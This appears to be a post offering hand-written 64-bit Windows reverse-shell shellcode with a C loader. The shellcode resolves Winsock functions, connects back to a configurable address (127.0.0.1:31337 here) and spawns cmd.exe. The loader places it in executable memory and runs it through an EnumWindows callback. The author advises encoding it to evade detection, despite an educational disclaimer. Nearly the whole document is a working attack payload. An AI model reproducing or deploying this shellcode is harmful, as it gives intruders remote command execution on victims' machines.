Hand-written Windows TCP Reverse-Shell Shellcode (64-bit).
On its own, it's probably heavily signatured. You might want to employ some encoding or obfuscation if you plan on using this on any engagements XD. Also, there are tons of examples and alternative ways of doing this on the internet, and the ol' Metasploit Framework exists, so you could use that too. Otherwise, if you're interested in how this stuff works, this will hopefully prove to be a helpful resource. It does contain some null bytes, but that's an easy fix (in many ways). Further, some optimizations can be made to decrease the number of bytes, but I'm relatively certain that you won't get windows shellcode to reliably spawn a reverse-shell in less than 500 bytes.
You know the drill; this right here is for educational and/or ethical hacking purposes only. If you hack while wearing a black hat, hold your L with grace.
But, seriously: This offensive capability is provided for educational and ethical hacking purposes only. The creator of this tool does not condone or support any illegal or unethical use of this software. Any misuse, including but not limited to unauthorized access to computer systems or networks, is the sole responsibility of the individual using the tool. By downloading or using this software, you agree to use it in compliance with all applicable laws and regulations. The creator disclaims any liability for any damages or legal consequences arising from the use or misuse of this tool.
Here's some code you can use to test the shellcode:
void main() {
unsigned char CustomShellcode[] =
"\x48\x33\xC9\x48\x33\xDB\x4D\x33\xD2\x65\x4C\x8B\x69\x60\x4D\x8B\x6D\x18\x49\x8B\x75\x20\x48\xAD\x48"
"\x96\x48\xAD\x4D\x33\xED\x4C\x8B\x78\x20\x45\x8B\x77\x3C\x4D\x03\xF7\x48\xFF\xC1\x48\xFF\xC1\x48\xC1"
"\xE1\x06\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF\xC1\x48\xFF"
"\xC1\x41\x8B\x14\x0E\x49\x03\xD7\x8B\x42\x14\x8B\x5A\x20\x49\x03\xDF\x8B\xC8\x48\xB8\x47\x65\x74\x50"
"\x72\x6F\x63\x41\x67\xE3\x12\x4D\x33\xD2\x44\x8B\x54\x8B\x04\x4D\x03\xD7\xFF\xC9\x49\x39\x02\x75\xEB"
"\x48\x33\xDB\x8B\x5A\x24\x49\x03\xDF\x48\xFF\xC1\x66\x44\x8B\x2C\x4B\x4D\x33\xDB\x48\x33\xDB\x44\x8B"
"\x5A\x1C\x4D\x03\xDF\x43\x8B\x5C\xAB\x04\x49\x03\xDF\x48\x33\xC0\x48\xC7\xC0\x61\x72\x79\x41\x50\x48"
"\xB8\x4C\x6F\x61\x64\x4C\x69\x62\x72\x50\x48\x8B\xD4\x49\x8B\xCF\x48\x83\xEC\x30\xFF\xD3\x48\x83\xC4"
"\x30\x4C\x8B\xF0\x48\x33\xC0\x48\xC7\xC0\x6C\x6C\x00\x00\x50\x48\xB8\x57\x53\x32\x5F\x33\x32\x2E\x64"
"\x50\x48\x8B\xCC\x48\x83\xEC\x30\x41\xFF\xD6\x4C\x8B\xF0\x48\x83\xC4\x30\x48\x33\xC0\x48\xC7\xC0\x75"
"\x70\x00\x00\x50\x48\xB8\x57\x53\x41\x53\x74\x61\x72\x74\x50\x48\x8B\xD4\x49\x8B\xCE\x48\x83\xEC\x30"
"\xFF\xD3\x48\x83\xC4\x30\x4C\x8B\xD8\x48\x33\xC9\x66\xB9\x98\x01\x48\x2B\xE1\x48\x8B\xD4\x66\xB9\x02"
"\x02\x48\x83\xEC\x30\x41\xFF\xD3\x48\x83\xC4\x30\x48\x33\xC0\x48\xC7\xC0\x74\x41\x00\x00\x50\x48\xB8"
"\x57\x53\x41\x53\x6F\x63\x6B\x65\x50\x48\x8B\xD4\x49\x8B\xCE\x48\x83\xEC\x30\xFF\xD3\x48\x83\xC4\x30"
"\x4C\x8B\xD8\x48\x33\xC9\x48\x83\xEC\x30\x48\x89\x4C\x24\x20\x48\x89\x4C\x24\x28\x4C\x8B\xC1\x48\xFF"
"\xC1\x48\x8B\xD1\x48\xFF\xC1\x49\x83\xC0\x06\x4D\x33\xC9\x41\xFF\xD3\x4C\x8B\xE8\x48\x83\xC4\x30\x48"
"\x33\xC0\x48\xC7\xC0\x63\x74\x00\x00\x50\x48\xB8\x57\x53\x41\x43\x6F\x6E\x6E\x65\x50\x48\x8B\xD4\x49"
"\x8B\xCE\x48\x83\xEC\x30\xFF\xD3\x4C\x8B\xE0\x49\x8B\xCD\x49\xC7\xC0\x7F\x00\x00\x01\x41\x50\x66\x41"
"\xB8\x7A\x69\x66\x41\x50\x4D\x33\xC0\x49\xFF\xC0\x49\xFF\xC0\x49\x8B\xD0\x66\x52\x49\xC7\xC0\x16\x00"
"\x00\x00\x4D\x33\xC9\x48\x8B\xD4\x41\x51\x41\x51\x41\x51\x48\x83\xEC\x30\x41\xFF\xD4\x48\x33\xC0\x48"
"\xB8\x6F\x63\x65\x73\x73\x41\x00\x00\x50\x48\xB8\x43\x72\x65\x61\x74\x65\x50\x72\x50\x48\x8B\xD4\x49"
"\x8B\xCF\x48\x83\xEC\x30\xFF\xD3\x48\x83\xC4\x30\x4C\x8B\xE0\x48\x33\xC0\x48\xB8\x63\x6D\x64\x2E\x65"
"\x78\x65\x00\x50\x48\x8B\xCC\x41\x55\x41\x55\x41\x55\x48\x33\xDB\x66\x53\x53\x53\x48\xC7\xC3\x00\x01"
"\x00\x00\x66\x53\x48\x33\xDB\x66\x53\x66\x53\x53\x53\x53\x53\x53\x53\x48\xC7\xC3\x68\x00\x00\x00\x53"
"\x48\x8B\xFC\x48\xFF\xC4\x48\xFF\xC4\x48\xFF\xC4\x48\xFF\xC4\x48\x8B\xDC\x48\x83\xEB\x20\x53\x57\x48"
"\x33\xDB\x53\x53\x53\x48\xFF\xC3\x53\x48\x33\xDB\x53\x53\x53\x53\x4C\x8B\xC3\x4C\x8B\xCB\x48\x8B\xD1"
"\x48\x8B\xCB\x41\xFF\xD4";
// In case DEP is enabled on the system, allocate an executable buffer in which
// to store the payload.
void* ExecutableBuffer = VirtualAlloc(0, sizeof(CustomShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!ExecutableBuffer) return;
memcpy(ExecutableBuffer, CustomShellcode, sizeof(CustomShellcode));
// Call a Win32 API function with the payload as a callback.
EnumWindows((WNDENUMPROC)ExecutableBuffer, NULL);